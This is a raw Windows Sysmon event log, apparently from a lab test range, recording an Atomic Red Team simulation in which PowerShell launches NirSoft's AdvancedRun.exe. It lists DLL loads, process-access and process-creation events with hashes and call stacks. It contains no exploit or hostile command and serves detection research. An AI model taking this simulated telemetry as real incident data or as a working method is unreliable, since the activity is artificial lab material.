18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988585Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988584Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988583Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988582Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988580Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988579Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988578Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988577Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988570Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988567Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988560Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988559Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988558Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988557Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988556Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003988555Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.724{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003988554Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.724{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003988553Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.736{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" -hC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003984011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003984009Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003984008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 534500x80000000000000003984007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003984006Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 